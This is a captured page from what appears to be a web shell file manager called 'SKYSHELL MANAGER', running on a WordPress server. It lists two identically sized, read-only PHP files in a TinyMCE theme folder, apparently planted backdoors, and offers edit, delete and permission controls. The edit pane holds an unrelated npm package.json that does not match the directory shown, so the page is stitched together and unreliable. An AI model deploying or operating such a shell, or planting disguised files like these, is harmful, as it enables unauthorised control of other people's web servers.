📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "_from": "remove-trailing-slash@^0.1.1", "_id": "remove-trailing-slash@0.1.1", "_inBundle": false, "_integrity": "sha512-o4S4Qh6L2jpnCy83ysZDau+VORNvnFw07CKSAymkd6ICNVEPisMyzlc00KlvvicsxKck94SEwhDnMNdICzO+tA==", "_location": "/@budibase/cli/remove-trailing-slash", "_phantomChildren": {}, "_requested": { "type": "range", "registry": true, "raw": "remove-trailing-slash@^0.1.1", "name": "remove-trailing-slash", "escapedName": "remove-trailing-slash", "rawSpec": "^0.1.1", "saveSpec": null, "fetchSpec": "^0.1.1" }, "_requiredBy": [ "/@budibase/cli/posthog-node" ], "_resolved": "https://registry.npmjs.org/remove-trailing-slash/-/remove-trailing-slash-0.1.1.tgz", "_shasum": "be2285a59f39c74d1bce4f825950061915e3780d", "_spec": "remove-trailing-slash@^0.1.1", "_where": "/usr/local/lib/node_modules/@budibase/cli/node_modules/posthog-node", "author": { "name": "Stephen Mathieson", "email": "me@stephenmathieson.com" }, "bugs": { "url": "https://github.com/stephenmathieson/remove-trailing-slash/issues" }, "bundleDependencies": false, "deprecated": false, "description": "removes trailing slashes", "devDependencies": { "mocha": "~1.12.0", "should": "~1.2.2" }, "directories": { "test": "test" }, "homepage": "https://github.com/stephenmathieson/remove-trailing-slash#readme", "keywords": [ "slashes", "trailing" ], "license": "MIT", "main": "index.js", "name": "remove-trailing-slash", "repository": { "type": "git", "url": "git://github.com/stephenmathieson/remove-trailing-slash.git" }, "scripts": { "test": "make test" }, "types": "index.d.ts", "version": "0.1.1" }
Save